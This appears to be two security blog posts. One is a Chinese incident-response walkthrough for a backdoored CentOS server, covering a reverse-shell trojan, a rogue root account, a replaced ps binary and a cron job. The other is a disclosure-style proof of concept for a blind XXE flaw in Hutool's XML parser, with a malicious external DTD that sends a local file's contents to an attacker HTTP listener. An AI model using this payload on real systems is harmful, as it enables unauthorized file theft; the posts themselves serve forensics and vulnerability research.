某CentOS主机应急响应

首先查看异常连接端口:

1
netstat -antp

pPHO7lt.png
有异常链接到192.168.226.131:6666 是shell.elf,疑似木马
根据pid查找位置:

1
lsof -p pid

pPHOIfA.png
找到木马位置/root/shell.elf
查看history和.bash_history发现记录已经被清除
查找特权账户:

1
awk -F: '$3==0 {print$1}' /etc/passwd

和远程登陆账户对比:

1
2
awk '/\$1|\$6/{print $1}' /etc/shadow
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

由此确认wxiaoge账户是黑客创建的后门账户
排查定时任务:
pPHO4FH.png
查找命令替换后门,使用rpm校验包是否被修改

1
2
rpm -Vf /usr/bin/*
rpm -Vf /usr/sbin/*

S:表示对应文件的大小(Size)不一致;
T:表示文件的修改时间不一致;
5:表示对应文件的MD5不一致;
D:表示文件的major和minor号不一致;
L:表示文件的符号连接内容不一致;
U:表示文件的owner不一致;
G:表示文件的group不一致;
M:表示对于文件的mode不一致;
pPHOTSI.png
随后发现ps的文件类型是script text,查看之
pPHO5Yd.png
找到后门elf,virustotal查杀
pPHObOf.png
由此可见,是shell.elf和centos_core.elf双后门,通过创建时间可以看到
植入后门的顺序为: shell.elf 后门、centos_core.elf后门、ps命令替换后门、定时任务
复原:

1
2
3
4
5
6
rm -rf /root/shell.elf
rm -rf /centos_core.elf
rm -rf /usr/bin/ps
mv /.hide_command/ps  /usr/bin/ps
vim /etc/passwd
crontab -e

溯源总结
黑客在1月13日21:51:32——21:58:31对服务器进行爆破,且在21:57:56 成功爆破出root账户密码并且进行登录,登录之后在1月14日00:51:12 植入了 shell.elf 后门、在00:57:03植入了 centos_core.elf后门、在 01:03:42植入了ps命令后门、在 01:05:53写了恶意定时任务,恶意IP:192.168.226.1

Hutool-XXE

Hutool is a small but comprehensive library of Java tools. A blind XXE vulnerability exists in its XML parsing module before v5.8.19, which may lead to arbitrary file reading.

Position

This vulnerability sources from the readBySax function in XmlUtil.java, which uses the SAXParserFactory and is by default susceptible to XXE attacks.

1
2
3
4
5
6
7
8
9
10
11
12
13
public static void readBySax(InputSource source, ContentHandler contentHandler) {
		// 1.获取解析工厂
		if (null == factory) {
			factory = SAXParserFactory.newInstance();
			factory.setValidating(false);
			factory.setNamespaceAware(namespaceAware);
		}
		// 2.从解析工厂获取解析器
		final SAXParser parse;
		XMLReader reader;
		try {
			parse = factory.newSAXParser();
            ...

Xxploitation

First you need to parse an XML which lead to a malicious external DTD:

xxeTest.java:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package cn.hutool.core;

import cn.hutool.core.collection.CollUtil;
import cn.hutool.core.io.resource.ResourceUtil;
import cn.hutool.core.util.XmlUtil;
import org.xml.sax.helpers.DefaultHandler;

import java.util.HashSet;

public class xxeTest {
	public static void main(String[] args){
		final HashSet<String> eles = CollUtil.newHashSet(
			"returnssms", "returnstatus", "message", "remainpoint", "teskID", "successCounts");
		XmlUtil.readBySax(ResourceUtil.getStream("C:\\Users\\vanya\\Documents\\GitHub\\hutool\\hutool-core\\src\\main\\java\\cn\\hutool\\core\\test.xml"), new DefaultHandler());
	}
}

test.xml:

1
2
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://192.168.3.183/evil.dtd"> %xxe; ]>

The malicious external DTD can be fetched through the HTTP server we deployed on 192.168.3.183:80.

1
python3 -m http.server 80

Since the XmlUtil.java does not echo back to our parsing (which is called Blind XXE), the DTD reads arbitrary file through another HTTP request.

evil.dtd:

1
2
3
4
<!ENTITY % file SYSTEM "file:///g:/test.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://192.168.3.183:9999/?x=%file;'>">
%eval;
%exfil;

Absolutely we need to use netcat for port listening on 9999, we run xxeTest.java and it comes firstly the request for evil.dtd then the request which contains the text we read from G:/test.txt:

pCiteYD.md.png

pCitZFO.md.png

pCitETK.png